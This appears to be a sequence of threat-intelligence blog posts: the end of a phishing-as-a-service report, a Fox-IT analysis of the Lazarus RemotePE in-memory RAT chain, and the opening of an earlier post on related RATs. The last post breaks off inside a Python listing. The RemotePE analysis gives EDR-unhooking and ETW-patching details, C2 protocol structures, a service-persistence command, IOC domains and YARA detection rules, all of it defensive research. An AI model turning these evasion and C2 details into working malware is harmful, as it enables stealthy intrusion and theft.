By deploying distinct domains that impersonate everything from local transit and payment apps to major e-commerce and gaming platforms, YY Lai Yu provides an example of how comprehensive these PhaaS offerings have become. To protect this highly localized infrastructure, the phishing sites featured a unique human verification anti-bot screen that appeared prior to the actual phishing page. By requiring a manual click to proceed, this mechanism successfully hindered automated analysis by security vendors, adding a layer of stealth to the localized campaign.

Like most other services, YY Lai Yu leverages RCS and iMessage to send encrypted messages in bulk and supports synchronized interactions with victims to harvest payment card and OTP data. The administration panel allows users to query their phished data and blocklist or highlight certain types of cards according to their BIN number, blocklist individual countries or territories, and register and manage new domains for their phishing pages using Alibaba's domain registration service. Additionally, panel administrators can create new operator users and assign them permissions. The service also offers domains that can be purchased within the administration panel.Β 

While YY Lai Yu showcases a focus on countries like Japan, the broader Chinese PhaaS ecosystem casts a wide global net. GTIG has observed other prominent services routinely deploying automated infrastructure to compromise users across the Americas, Europe, Australia, and the Middle East.Β 

OutlookΒ 

The continued popularity of these services demonstrates a sustained interest in payment card fraud from China-based threat actors. The multitude of sophisticated PhaaS platforms available for purchase and the threat actors' focus on the exploitation of digital wallet tokenization and MFA bypass demonstrates that the China-based criminal ecosystem continues to evolve, enabling threat actors with limited technical skills to conduct phishing operations.Β 

Standard phishing security measures (such as user awareness training) remain an important first line of defense. However, the proliferation of the Chinese-language PhaaS ecosystem underscores a need for technical security controls that go beyond user education. For example, transitioning to FIDO2/WebAuthn infrastructure represents an effective countermeasure against the real-time interception of account authentication OTPs. While security keys cannot prevent a user from entering payment details into a novel phishing site directly, increasing the difficulty of leveraging stolen credentials still radically shrinks an adversary's opportunities. These enterprise authentication upgrades should be paired with risk-based verification and device fingerprinting by issuing banks during the digital wallet provisioning process.

As these operators continue to refine their tooling, the goal for defenders must shift from simply "detecting" a phish to making the victim's credentials technically impossible to weaponize. Ongoing and frequent updates to these platforms indicate that Chinese-speaking PhaaS operators are continuing to refine their tooling to maximize global impact.

RemotePE: The Lazarus RAT that lives in memory

22 May 2026 at 16:55

Authors: Yun Zheng Hu and Mick Koomen

Summary

Last year, we published research1 about a North Korean Lazarus subgroup targeting financial and cryptocurrency organizations, encountered during multiple incident response engagements. This Lazarus subgroup overlaps with activity linked to AppleJeus2, Citrine Sleet3, UNC47364, and Gleaming Pisces5. In one investigation, we observed that the actor had replaced ThemeForestRAT and PondRAT with a more sophisticated memory-only toolset. This follow-up post covers all three malware families from that toolset: DPAPILoader, RemotePELoader and RemotePE.

The three form a chain. DPAPILoader decrypts and loads RemotePELoader from disk using the Windows Data Protection API (DPAPI). RemotePELoader beacons to a C2 server and waits until it receives the next stage: RemotePE, a RAT executed entirely in memory and never written to disk, leaving no filesystem artifacts. At the time of writing, we have not found samples of RemotePELoader or RemotePE on VirusTotal.

The toolset’s environmental keying, memory-only execution, EDR evasion, and low forensic footprint suggest it is purpose-built for long-term observation campaigns. This allows the actor to quietly maintain access over an extended period before moving to a high-impact final objective such as data theft or a large-scale financial heist, consistent with this actor’s known history.
We are sharing samples with detection rules and indicators of compromise (IOCs) to help defenders identify and respond to this toolset in their environments.

Figure 1: The three-stage chain: DPAPILoader decrypts and loads RemotePELoader from disk, which retrieves and executes RemotePE in memory

DPAPILoader: First-stage, environmentally keyed loader

DPAPILoader is implemented as a DLL whose purpose is to decrypt and load an encrypted payload from disk using DPAPI. In the incident response case, it was found as C:\Windows\System32\Iassvc.dll, installed under the service name β€œInternet Authentication Service.” This service runs Iassvc.dll automatically on system startup, providing persistence for the toolset. The filename and service name are chosen to mimic the legitimate Windows Server Internet Authentication Service (IAS) and its accompanying DLL C:\Windows\System32\iassvcs.dll (note the extra β€˜s’ in the filename).

In Listing 1, we list a Windows service record, extracted from the forensic image using Dissect6, that shows the masquerading in detail.

          name (string) = Ias
   displayname (string) = Internet Authentication Service
   description (string) = Internet Authentication Service (IAS) is a component of Windows Server operating systems that provides centralized user authentication, authorization and accounting.
      servicedll (path) = %SystemRoot%\system32\Iassvc.dll
       imagepath (path) = %systemroot%\system32\svchost.exe
imagepath_args (string) = -k netsvcs -p
    objectname (string) = LocalSystem
         start (string) = Auto Start (2)
          type (string) = Service - Own Process (0x10)
  errorcontrol (string) = Normal (1)

Listing 1: Service record from Dissect showing Windows service that runs DPAPILoader

The sample from our investigation first checks whether it is running under C:\Windows\System32\Svchost.exe. It then loops over all files matching the wildcard path C:\ProgramData\Microsoft\Windows\DeviceMetadataStore\en-US*.*. This directory normally contains Microsoft Cabinet files used for device metadata packages. DPAPILoader skips any file beginning with the Cabinet magic bytes (MSCF / 4D 53 43 46), filtering out legitimate metadata packages. Any file that passes this check and is larger than 51200 bytes (50 KiB) is decrypted using DPAPI and loaded into memory using libpeconv7 , an open-source reflective PE loading library.

Across the DPAPILoader samples we observed, the loading mechanism and host process differ, as documented in the Observed Samples section, but the core behaviour is consistent.

DPAPI Encryption

DPAPILoader uses the Windows Data Protection API (DPAPI) to decrypt its payload. DPAPI ties cryptographic keys to a specific user account, with key management handled entirely by the OS. The caller only invokes encrypt and decrypt functions.

This offers the actor two advantages. First, the encrypted payload on disk is never in plaintext: if a sample is uploaded to VirusTotal, it is useless without the victim’s DPAPI keys. Static analysis is effectively impossible without them. Second, each deployment produces a unique encrypted blob, meaning the payload hash differs across victims and evades hash-based detection. The only prerequisite is prior access to the target machine to encrypt and drop the payload, something the actor has at this stage of the intrusion.

After DPAPI decryption, the payload is additionally XORed with 0x8D before loading. This is consistent across all observed DPAPILoader samples. This approach is an instance ofΒ environmental keying8, where malware is bound to a specific victim environment and cannot be analysed or executed elsewhere.

Observed Samples

We identified three DPAPILoader samples spanning roughly nine months, with differences in loading mechanism, host process, and payload storage.

The first sample (Iassvc.dll) is loaded as a Windows service via Svchost.exe, the second (sspicli.dll) is sideloaded by ESET’s edp.exe, and the third (wmiclnt.dll) uses the WmiOpenBlock export with no identified host process.

PE timestampDLL nameExportString obfuscation
2023-11-14Iassvc.dllServiceMainXOR 0x8D
2024-02-21sspicli.dllInitSecurityInterfaceWXOR 0x8D
2024-08-21wmiclnt.dllWmiOpenBlockDPAPI + XOR 0x8D
Table 1: Observed DPAPILoader samples by PE timestamp

The first two samples load the DPAPI-encrypted payload from the DeviceMetadataStore path. The third embeds the encrypted payload directly in the DLL, removing the dependency on a separate file on disk.

The second and third samples were found on VirusTotal. Without the victims’ DPAPI keys, we are unable to decrypt them. Both are a practical demonstration of the environmental keying discussed earlier.

The first sample comes from our incident response case, where a full forensic image of the compromised machine gave us access to the victim’s DPAPI keys, allowing us to trivially decrypt the payload using a Dissect9 shell:

Figure 2: Decrypting the DPAPI-encrypted PE payload using Dissect

It turns out the decrypted payload is another loader, which we named RemotePELoader.

RemotePELoader: Second-stage, operator-controlled loader

RemotePELoader is decrypted from the DPAPI payload on disk and is responsible for retrieving the core module from a C2 server and loading it into memory. Both the loader and the core module share a configuration file stored on disk, and are designed to work as a pair, deployed together as part of the same installation. Upon execution, RemotePELoader spawns a thread that first applies evasion techniques, reads the configuration, and then enters a C2 polling loop. It has no RAT functionality of its own; its sole purpose is to load the next stage.

HellsGate & EDR Evasion

RemotePELoader applies two evasion techniques before performing any further actions. The first is HellsGate10 (specifically the TartarusGate11 variant), a technique that dynamically resolves Windows syscall numbers at runtime. It scans the loaded ntdll.dll for syscall stubs to obtain the numbers for NtOpenSection, NtMapViewOfSection, NtUnmapViewOfSection, NtProtectVirtualMemory, and NtClose. Using these direct syscalls, RemotePELoader iterates the Process Environment Block’s module list and remaps each DLL from its \KnownDlls section object, a kernel-maintained mapping of trusted system DLLs, replacing any hooked in-memory copies with clean ones and effectively unhooking all userland security product hooks.

The second is patching Event Tracing for Windows (ETW), a Windows mechanism used by security products to monitor process behaviour at runtime. RemotePELoader patches function EtwEventWrite() in the current process using a well-known technique, overwriting it with the following bytes.

48 33 c0          ; XOR    RAX, RAX
c3                ; RET

Listing 2: Bytes written toΒ EtwEventWriteΒ to disable ETW event generation

This causes EtwEventWrite to immediately return 0, suppressing all ETW event generation and preventing security tooling that relies on ETW telemetry from receiving events.

Together, these two techniques hinder detection by endpoint security products that rely on userland API hooking or ETW telemetry.

Configuration

After applying evasion techniques, RemotePELoader reads a configuration file using the same wildcard search as DPAPILoader:

\??\C:\ProgramData\Microsoft\Windows\DeviceMetadataStore\en-US*.*

The configuration file is smaller than the encrypted RemotePELoader payload, so it identifies it by looking for a file that does not begin with Cabinet magic bytes and is smaller than 20480 bytes (20 KiB). When found, it decrypts the contents using DPAPI and XORs all bytes with 0x8D.

Figure 3: Decrypting the DPAPI-encrypted config using Dissect

The configuration file structure is depicted in Listing 3.

struct RemotePEC2Config 	// sizeof=0xb38
{
  int dwReconnectMinutes;	// minutes to wait after C2 session ends
  int dwSleepUntilEpoch;    // UNIX epoch wake-up timestamp
  int dwSleepMin;		    // minimum sleep time between C2 polls
  int dwSleepMax;           // maximum sleep time between C2 polls
  wchar_t wsC2Url_1[260];   // C2 URL (up to three)
  wchar_t wsC2Url_2[260];
  wchar_t wsC2Url_3[260];
  wchar_t wsProxy[260];     // optional proxy address
  char sProxyUserName[128]; // optional proxy username
  char sProxyPassword[128]; // optional proxy password
  wchar_t wsUserAgent[260]; // configurable HTTP user-agent string
};

Listing 3: RemotePE C2 configuration structure on disk

Since both RemotePELoader and the configuration file reside in the same directory, a size check is used to distinguish between them, without it, the configuration file could be mistakenly loaded as a PE, or the PE read as a configuration file. This shared logic, combined with the identical cryptographic scheme, further ties the two loaders together as a coordinated toolset.

C2 Communication

After reading the configuration, RemotePELoader enters a loop until it receives a PE payload from the server. On the first run it sleeps until the configured wake-up timestamp and on subsequent iterations it sleeps for a random interval within the configured bounds. It then finds an active C2 server via a check-in request and keeps polling for a PE payload. If no payload is returned, it restarts the loop. Once a payload is received, it sends a confirmation request to the active C2, loads the retrieved PE payload using libpeconv, and exits the thread.

RemotePELoader communicates with the C2 server over HTTP, using POST requests. Host information is passed via the HTTP Cookie header, with a check-in request identified by the presence of at_check=true. The server responds with a JSON object where the odata.metadata key contains the C2 session ID. Once a session ID is obtained, subsequent requests replace the at_check cookie with ai_session, set to the session ID received from the server. The table below documents each cookie field used in the check-in request.

Cookie nameCookie value description
MSCCRandom buffer with regex [0-9a-z]{24} prepended to the string β€œ-c1=2-c2=2-c3=2”
MicrosoftApplicationsTelemetryDeviceIdBot ID
MSFPCRandom numbers with format string β€œ%08lx%08lx%08lx%08lx”
HASHRandom number with format string β€œ%04x”
LVCurrent year and month in YYYYMM format
VConstant number
LUEpoch of current time
MS0Random numbers with format string β€œ%08lx%08lx%08lx%08lx”, likely to indicate RemotePELoader request
at_checkIndicates a check-in request (no session yet)
ai_sessionSession ID from C2 after initial check-in
Table 2: RemotePELoader check-in request Cookie fields

Once a C2 session is established, RemotePELoader polls the server at random intervals between the configured minimum and maximum sleep times. In our tests, the server did not immediately return a payload, suggesting an actor-in-the-loop model where the operator manually decides when to deliver it. When the operator delivers the payload, the server returns a JSON object where the odata.metadata key contains the PE payload, AES-GCM encrypted and Base64-encoded.

Figure 4: RemotePELoader C2 session showing the server returning the encrypted PE payload

All messages exchanged with the C2 server are AES-encrypted, except for the initial check-in response containing the session ID. The AES key and nonce for each message are derived using SplitMix64, seeded with a random value generated by a Mersenne Twister PRNG. Each message is structured as follows, with the seed prepended to the AES-GCM tag and ciphertext:

struct C2Message {
    uint64_t aes_seed;          // SplitMix64 seed for AES key and nonce
    unsigned char aes_tag[16];  // AES authentication tag
    unsigned char ciphertext[]; // AES-GCM encrypted data
};

Listing 4: C2 message structure used by RemotePELoader and RemotePE

The decrypted payload is RemotePE, a fully-fledged RAT that runs entirely in memory, covered in the next section.

RemotePE: Final-stage, in-memory RAT

RemotePE is a fully-fledged RAT that we retrieved directly from a RemotePELoader C2 server by emulating its C2 protocol.

Written in C++ using object-oriented programming, RemotePE is a multithreaded program that appears to share a codebase with RemotePELoader. Both components share the same on-disk configuration file, this is by design: if an operator updates the configuration and the host reboots, both components need to read the same updated values to maintain access. Furthermore, C2 logic, including session handling, AES-GCM encryption, and the C2Message structure are equal. Also, in the samples from our investigation, RemotePELoader and RemotePE each verify they were loaded by the previous stage by checking that lpReserved == 0x1000 in DllMain, enforcing the integrity of the chain.

Control flow

RemotePE starts two threads at startup. The first, IChannelController, handles C2 communication. The second, IMiddleController, processes commands received from the C2 server. When the C2 server ends the current session, both threads stop and RemotePE either exits or sleeps until the configured wake-up time.

The IChannelController thread first locates an active C2 server and then polls it for commands. Between each polling iteration, the thread sleeps for a configured random interval, or wakes immediately if command output is available. In that case, the output is sent back to the C2 server without waiting for the next polling interval, allowing the operator to issue the next command promptly. Received commands are pushed to a queue consumed by IMiddleController.
The IMiddleController thread processes commands from the queue and pushes output back to a queue read by IChannelController. Each C2 message from the server consists of a list of entries delimited by $, where each entry is a bundle of commands (see the C2 Protocol section). Commands can optionally be executed in a separate thread, and all output is merged into a single reply sent back to the server.

While sleeping, RemotePE also checks for the existence of a Windows event named 554D5C1F-AABE-49E4-AB57-994D22ECED28. If present, it wakes immediately and restarts both controller threads. Neither RemotePE nor the loaders create this event, implying it is created externally as an out-of-band mechanism to wake RemotePE on demand.

Commands

RemotePE supports six categories of commands, identified by their C++ runtime type information (RTTI) class names. The table below lists each class along with the functionality it exposes. An operator invokes a function by specifying its class ID and function ID, along with any required parameters.

Table 3: RemotePE commands with their RTTI class names
Internal class name Class ID Function ID Description
IConfigProfile 0 0 Get the current C2 configuration
1 Set the C2 configuration
IConsole 1 0 Get the current working directory
1 Change the current working directory
2 Execute a command and return its output
3 Get loaded modules (DLLs)
4 Register a new module (DLL)
5 Invoke a registered module’s function pointer with arguments
6 Unload a module (DLL)
IFileExplorer 2 0 Get information on the drives of the system
1 List the files in a directory
2 Delete a file
3 Rename a file
4 Read from a file
5 Write to a file
6 ZIP a file or directory and return it as data
IProcess 3 0 Get process listing
1 Kill process by ID
2 Search for a file in the directories of a given environment variable
3 Create a process
4 Create a process as a user
ITimer 4 0 Sleep for X minutes, non-persistent
1 Sleep for X minutes, and persist this also in the C2 configuration on disk
2 Exit RemotePE
IPing 5 N/a A no-op command

Most commands provide standard RAT functionality. One notable exception is the file deletion command, which overwrites each file with constant bytes seven times before renaming and deleting it, a secure deletion pattern consistent with PondRAT and POOLRAT, two malware families previously associated with this actor. Unlike some implementations that overwrite with random bytes, RemotePE uses constant bytes, though the multi-pass overwrite and rename pattern is shared.

RemotePE also implements a plugin system that allows the operator to dynamically register DLL payloads at runtime. These payloads must be valid both as a Windows DLL and as reflective shellcode, with the DLL entry point re-executed to unload them: a dual-format requirement and unload behaviour that matches pe_to_shellcode12 , which refers to such payloads as β€œshellcodified DLLs”. RemotePE can hold multiple plugins simultaneously, which the operator can invoke via the IConsole commands described above.

C2 Protocol

Similar to RemotePELoader, the IChannelController thread begins by locating an active C2 server via a check-in request, then polls it in a loop. The request format is largely identical to that of RemotePELoader, with one exception: RemotePE uses the MUID cookie instead of MS0, which the C2 server likely uses to differentiate between the two families. Session handling is identical to RemotePELoader. For a full description of cookie fields, see the RemotePELoader C2 Communication section.

Though RemotePE communicates with the same C2 server as RemotePELoader, the protocol diverges after the initial check-in. The outer message structure is identical to RemotePELoader’s C2Message (seed, AES-GCM tag, and ciphertext). The decrypted ciphertext, however, contains a RemotePE-specific structure, see Listing 5.

struct C2Command {
    uint32_t payload_size;
    uint16_t class_id;    	 // class ID from the commands table
    uint16_t function_id; 	 // function ID from the commands table
    uint32_t request_id;  	 // used to match responses
    unsigned char payload[]; // variable length, payload_size bytes
};

struct C2CommandBatch {
    uint16_t command_count;
    C2Command commands[];	 // variable length, command_count entries
};

Listing 5: RemotePE C2 command structures

Command responses sent back to the server use the structures defined in Listing 6.

struct C2CommandResponse {
    uint32_t response_size;
    uint32_t error;	   	      // error code, if any
    uint32_t request_id;  	  // used to respond to a C2Command request
    unsigned char payload[];  // variable length, compressed, response_size bytes
};

struct C2CommandResponseBatch {
    uint16_t command_count;
    C2CommandResponse commands[];	 // variable length, command_count entries
};

Listing 6: RemotePE command output structures

When IChannelController receives a C2CommandBatch, it decrypts it and pushes the commands to the queue consumed by IMiddleController, as described in the Control Flow section. Command output is compressed using MSZIP via the Windows Cabinet compression API (cabinet.dll).

Figure 5: RemotePE command parsing

Figure 5 shows the C2 server command parsing of the IMiddleController thread. At first, command batches can be delimited by the β€œ$”, where each command of a batch is traversed. After running the commands, all command outputs that were not run as a separate thread are merged into a C2 reply that is sent back to the server.

Command output is compressed, and the whole C2CommandResponseBatch structure is AES-GCM encrypted and Base64-encoded, before being sent back to the C2 server in the armAuthorization JSON key. An example of this is shown in Figure 6. The JSON keys and HTTP cookie names used within the C2 protocol, e.g., armAuthorization, odata.metadata, and MSFPC are also used within the Microsoft ecosystem.

Figure 6: RemotePE returning command output to the C2 server via theΒ armAuthorizationΒ JSON key

A example Python script to decrypt C2 command responses can be found here:

Figure 7: Example of a decrypted C2 command response

Retrieved Samples

We obtained four RemotePE samples: three retrieved from active C2 servers and one recovered through forensic analysis. The C2 servers were identified during the incident response engagement or through fingerprinting. Ordering the samples by PE compile timestamp reveals incremental changes across versions, primarily in the config loading mechanism and bot identification method, suggesting active development between mid-2023 and mid-2024.

PE timestampConfig loadingBot ID
2023-07-04Find DPAPI encrypted config on diskSOFTWARE\Microsoft\SQMClient\MachineId
2023-10-17C2 URLs passed via lpThreadParameter, fixed User-AgentSOFTWARE\Microsoft\SQMClient\MachineId
2024-04-18Find DPAPI encrypted config on diskSOFTWARE\Microsoft\SQMClient\MachineId
2024-05-11DPAPI config path passed via lpThreadParameterSoftware\Microsoft\Cryptography\MachineGuid
Table 4: Observed RemotePE samples by PE timestamp

The 2023-10-17 sample does not use DPAPI and instead receives its C2 urls directly via lpThreadParameter, parsed using CommandLineToArgvW. Unlike the other samples, it also performs HellsGate syscall resolution and ETW patching itself, rather than relying on RemotePELoader to do so. This suggests that early versions of RemotePE were more standalone and not exclusively tied to the DPAPILoader/RemotePELoader chain, capable of being deployed by any loader passing the configuration as a thread parameter.

The table below shows the time between our initial check-in and RemotePE payload delivery across six successful retrieval sessions, along with the payload delivery time converted to Korea Standard Time (KST, UTC+9).

C2 session started (UTC)Payload returned (UTC)DeltaPayload returned (KST,UTC+9)
2024-02-07 00:212024-02-07 01:0948 min2024-02-07 10:09
2024-12-09 08:482024-12-09 09:0820 min2024-12-09 18:08
2024-12-10 23:572024-12-11 00:4649 min2024-12-11 09:46
2025-01-10 08:212025-01-10 08:210 min2025-01-10 17:21
2025-02-10 21:562025-02-10 23:0367 min2025-02-11 08:03
2025-07-09 11:572025-07-10 07:5020 hrs2025-07-10 16:50
Table 5: RemotePELoader C2 session and RemotePE payload delivery timestamps

Many other sessions yielded no payload. All six successful payload deliveries fall within daytime hours in the UTC+9 timezone (08:00–19:00 KST), as shown in Table 5.

Infrastructure

The RemotePE C2 infrastructure is hosted on Namecheap shared hosting, consistent with what we observed in earlier campaigns involving ThemeForestRAT and PondRAT. As with those campaigns, the use of shared hosting makes IP-based blocking ineffective, since the same server hosts legitimate domains.

Through fingerprinting of C2 server characteristics, we identified additional domains and servers beyond those found during the incident response engagement. These are listed in the IOCs section.

At the time of writing, several C2 servers we identified never returned a payload during our emulated sessions, though some remain live. Others that had previously delivered RemotePE appear to no longer do so. Whether this reflects the infrastructure going dormant, being abandoned, a change in C2 protocol, or the actor detecting unexpected connections is unclear.

Conclusion

The DPAPILoader, RemotePELoader, and RemotePE toolset represents a deliberate effort to minimise forensic footprint. A RemotePELoader sample from disk uploaded to VirusTotal is useless without the victim’s DPAPI keys. Furthermore, by combining environmental keying via DPAPI with fully in-memory execution of the final payload, the actor ensures that forensic imaging of the disk will not yield recoverable artifacts of RemotePE.

The actor-in-the-loop delivery model and the toolset’s low detection rate (neither RemotePELoader nor RemotePE appeared on VirusTotal prior to this publication) suggest this toolset may be reserved for high-value targets where long-term, stealthy access is the objective, consistent with this Lazarus subgroup’s known focus on financial and cryptocurrency organisations.

Defenders should focus on host-based detection. The most reliable indicators are DPAPI-encrypted blobs in unexpected directories, in our case this was theΒ DeviceMetadataStoreΒ directory, though this can vary. Another indicator is to look for suspicious DLLs masquerading as legitimate Windows services or sideloaded DLLs.

For network-based detection, SNI fields and DNS queries for known C2 domains are the most actionable opportunities. Pivoting on Namecheap shared hosting infrastructure also proved effective in identifying additional malicious C2 servers during our investigation. Organisations with TLS inspection can detect the characteristic cookie fields and JSON keys, though care should be taken to avoid false positives given the traffic’s close resemblance to legitimate Microsoft traffic.

We are sharing the samples, including decrypted versions that would otherwise remain inaccessible due to environmental keying, both for preservation and to help defenders detect and respond to this toolset. YARA rules and IOCs are provided below.

Indicators of Compromise

If you have any questions or need assistance based on these findings, please contact Fox-IT CERT at cert@fox-it.com. For urgent matters, call 0800-FOXCERT (0800-3692378) within the Netherlands, or +31152847999 internationally to reach one of our incident responders.

Domains

DomainFirst seenLast seen
livedrivefiles[.].com2023-07-172025-07-27
aes-secure[.]net2023-09-18*
azureglobalaccelerator[.]com2023-09-18*
msdeliverycontent[.]com2024-02-192026-05-09
akamaicloud[.]com2024-02-192025-02-14
intelcloudinsights[.]com2024-04-132026-04-23
devicelinkintel[.]com2024-08-16*
Table 6: RemotePE(Loader) C2 domains. Entries marked with * in the β€œLast seen” column were still active at the time of writing.

Host based indicators

TypeIndicatorComment
file.nameIassvc.dllFilename used for DPAPILoader
event.name554D5C1F-AABE-49E4-AB57-994D22ECED28RemotePE specific event name
Table 7: RemotePE host-based indicators

Samples

digest.sha256Comment
4f6ae0110cf652264293df571d66955f7109e3424a070423b5e50edc3eb43874DPAPILoader (Iassvc.dll)
aa4a2d1215f864481994234f13ab485b95150161b4566c180419d93dda7ac039DPAPILoader (wmiclnt.dll)
159471e1abc9adf6733af9d24781fbf27a776b81d182901c2e04e28f3fe2e6f3DPAPILoader (sspicli.dll)
7a05188ab0129b0b4f38e2e7599c5c52149ce0131140db33feb251d926428d68RemotePELoader (decrypted from disk)
37f5afb9ed3761e73feb95daceb7a1fdbb13c8b5fc1a2ba22e0ef7994c7920efRemotePE (2023-07-04)
6b33d20196267b0d64bca815ca863558d26b17cee77caf62a6cce8eae555ac8dRemotePE (2023-10-17)
62e040a32aac2d2faa8d2bffa2cf7ab662228cebf9bb78eaa0a633c0b729d119RemotePE (2024-04-18)
710f15302859c7af1c1e25219d704841b3fdbc48f16a5a574d5ab6cf4f4842e8RemotePE (2024-05-11)
Table 8: Samples observed related to this activity

YARA Rules

rule Lazarus_DPAPILoader_Hunting {
  meta:
    description = "Hunting rule to detect DPAPILoader, a loader used to load RemotePE."
    author      = "Fox-IT / NCC Group"
 
  strings:
    $msg_1 = "[!] Could not allocate memory at the desired base!\n"
    $msg_2 = "[!] Virtual section size is out ouf bounds: "
    $msg_3 = "[!] Invalid relocDir pointer\n"
    $msg_4 = "[-] Not supported relocations format at %d: %d\n"
    $msg_5 = "[!] Cannot fill imports into 32 bit PE via 64 bit loader!\n"
 
  condition:
    any of them and pe.imports("Crypt32.dll", "CryptUnprotectData")
}
 
rule Lazarus_RemotePE_C2_strings {
  meta:
    description = "RemotePE strings used for C2."
    author      = "Fox-IT / NCC Group"
 
  strings:
    $a = "MicrosoftApplicationsTelemetryDeviceId" wide ascii xor
    $b = "armAuthorization" wide ascii xor
    $c = "ai_session" wide ascii xor
 
  condition:
    uint16(0) == 0x5A4D and all of them
}
 
rule Lazarus_RemotePE_class_strings {
  meta:
    description = "RemotePE class strings."
    author      = "Fox-IT / NCC Group"
 
  strings:
    $a = "IMiddleController" ascii wide xor
    $b = "IChannelController" ascii wide xor
    $c = "IConfigProfile" ascii wide xor
    $d = "IKernelModule" ascii wide xor
 
  condition:
    all of them
}

rule Lazarus_RemotePE_DPAPI_Encrypted_config {
  meta:
    description = "Detects RemotePE DPAPI-encrypted config on disk"
    author      = "Fox-IT Security Research Team"
  condition:
    filesize == 3094
    and uint32(0) == 0x00000001      // DPAPI blob version = 1
    and uint32(0x8E) == 0x00000B40   // dwDataLen = 0xB40 (padded config)
}

Listing 7: YARA rules for DPAPILoader, RemotePELoader and RemotePE

References

  1. https://blog.fox-it.com/2025/09/01/three-lazarus-rats-coming-for-your-cheese β†©οΈŽ
  2. https://securelist.com/operation-applejeus/87553/ β†©οΈŽ
  3. https://www.microsoft.com/en-us/security/blog/2024/08/30/north-korean-threat-actor-citrine-sleet-exploiting-chromium-zero-day/ β†©οΈŽ
  4. https://cloud.google.com/blog/topics/threat-intelligence/3cx-software-supply-chain-compromise β†©οΈŽ
  5. https://unit42.paloaltonetworks.com/threat-assessment-north-korean-threat-groups-2024/ β†©οΈŽ
  6. https://docs.dissect.tools/en/stable/ β†©οΈŽ
  7. https://github.com/hasherezade/libpeconv β†©οΈŽ
  8. https://attack.mitre.org/techniques/T1480/001/ β†©οΈŽ
  9. https://docs.dissect.tools/en/stable β†©οΈŽ
  10. https://github.com/am0nsec/HellsGate β†©οΈŽ
  11. https://github.com/trickster0/TartarusGate β†©οΈŽ
  12. https://github.com/hasherezade/pe_to_shellcode/releases/tag/v1.2 β†©οΈŽ

Three Lazarus RATs coming for your cheese

1 September 2025 at 15:00

Authors: Yun Zheng Hu and Mick Koomen

A Telegram from Pyongyang

Introduction

In the past few years, Fox-IT and NCC Group have conducted multiple incident response cases involving a Lazarus subgroup that specifically targets organizations in the financial and cryptocurrency sector. This Lazarus subgroup overlaps with activity linked to AppleJeus1, Citrine Sleet2, UNC47363, and Gleaming Pisces4. This actor uses different remote access trojans (RATs) in their operations, known as PondRAT5, ThemeForestRAT and RemotePE. In this article, we analyse and discuss these three.

First, we describe an incident response case from 2024, where we observed the three RATs. This gives insights into the tactics, techniques, and procedures (TTPs) of this actor. Then, we discuss PondRAT, ThemeForestRAT and RemotePE, respectively.

PondRAT received quite some attention last year, we give a brief overview of the malware and document other similarities between PondRAT and POOLRAT (also known as SimpleTea) that have not yet been publicly documented. Secondly, we discuss ThemeForestRAT, a RAT that has been in use for at least six years now, but has not yet been discussed publicly. These two malware families were used in conjunction, where PondRAT was on disk and ThemeForestRAT seemed to only run in memory.

Lastly, we briefly describe RemotePE, a more advanced RAT of this group. We found evidence that the actor cleaned up PondRAT and ThemeForestRAT artifacts and subsequently installed RemotePE, potentially signifying a next stage in the attack. We cannot directly link RemotePE to any public malware family at the time of this writing.

In all cases, the actor used social engineering as an initial access vector. In one case, we suspect a zero-day might have been used to achieve code execution on one of the victim’s machines. We think this highlights their advanced capabilities, and with their history of activity, also shows their determination.

A Telegram from Pyongyang

In 2024, Fox-IT investigated an incident at an organisation in decentralized finance (DeFi). There, an employee’s machine was compromised through social engineering. From there, the actor performed discovery from inside the network using different RATs in combination with other tools, for example, to harvest credentials or proxy connections. Afterwards, the actor moved to a stealthier RAT, likely signifying a next stage in the attack.

In Figure 1, we provide an overview of the attack chain, where we highlight four phases of the attack:

  1. Social engineering: the actor impersonates an existing employee of a trading company on Telegram and sets up a meeting with the victim, using fake meeting websites.
  2. Exploitation: the victim machine gets compromised and shortly afterwards PondRAT is deployed. We are uncertain how the compromise was achieved, though we suspect a Chrome zero-day vulnerability was used.
  3. Discovery: the actor uses various tooling to explore the victim network and observe daily activities.
  4. Next phase: after three months, the actor removes PerfhLoader, PondRAT and ThemeForestRAT and deploys a more advanced RAT, which we named RemotePE.
Figure 1: Overview of the attack chain from a 2024 incident response case involving a Lazarus subgroup

Social Engineering

We found traces matching a social engineering technique previously described by SlowMist6. This social engineering campaign targets employees of companies active in the cryptocurrency sector by posing as employees of investment institutions on Telegram.

This Lazarus subgroup uses fake Calendly and Picktime websites, including fake websites of the organisations they impersonate. We found traces of two impersonated employees of two different companies. We did not observe any domains linked to the β€œAccess Restricted” trick as described by SlowMist. In Figure 2, you can see a Telegram message from the actor, impersonating an existing employee of a trading company. Looking up the impersonated person, showed that the person indeed worked at the trading company.

Figure 2: Lazarus subgroup impersonating an employee at a trading company interested in the cryptocurrency sector

From the forensic data, we could not establish a clear initial access vector. We suspect a Chrome zero-day exploit was used. Although, we have no actual forensic data to back up this claim, we did notice changes in endpoint logging behaviour. Around the time of compromise, we noted a sudden decrease in the logging of the endpoint detection agent that was running on the machine. Later, Microsoft published a blogpost7, describing Citrine Sleet using a zero-day Chrome exploit to launch an evasive rootkit called FudModule8, which could explain this behaviour.

Persistence with PerfhLoader

The actor leveraged the SessionEnv service for persistence. This existing Windows service is vulnerable to phantom DLL loading9. A custom TSVIPSrv.dll can be placed inside the %SystemRoot%\System32\ directory, which SessionEnv will load upon startup. The actor placed its own loader in this directory, which we refer to as PerfhLoader. Persistence was ensured by making the service start automatically at reboot using the following command:

sc config sessionenv start=auto

The actor also modified the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SessionEnv\RequiredPrivileges registry key by adding SeDebugPrivilege and SeLoadDriverPrivilege privileges. These elevated privileges enable loading kernel drivers, which can bypass or disable Endpoint Detection and Response (EDR) tools on the compromised system.

Figure 3: PerfhLoader loaded through SessionEnv service via Phantom DLL Loading which in turn loads PondRAT or POOLRAT

In a case from 202010, this actor used the IKEEXT service for phantom DLL loading, writing PerfhLoader to the path %SystemRoot%\System32\wlbsctrl.dll. The vulnerable VIAGLT64.SYS kernel driver (CVE-2017-16237) was also used to gain SYSTEM privileges.

PerfhLoader is a simple loader that reads a file with a hardcoded filename (perfh011.dat) from its current directory, decrypts its contents, loads it into memory and executes it. In all observed cases, both PerfhLoader and the encrypted DLL were in the %SystemRoot%\System32\ folder. Normally, perfhXXX.dat files located in this folder contain Windows Performance Monitor data, which makes it blend in with normal Windows file names.

The cipher used to encrypt and decrypt the payload uses a rolling XOR key, we denote the implementation in Python code in Listing 1.

def crypt_buf(data: bytes) -> bytes:
    xor_key = bytearray(range(0x10))
    buf = bytearray(data)
    for idx in range(len(buf)):
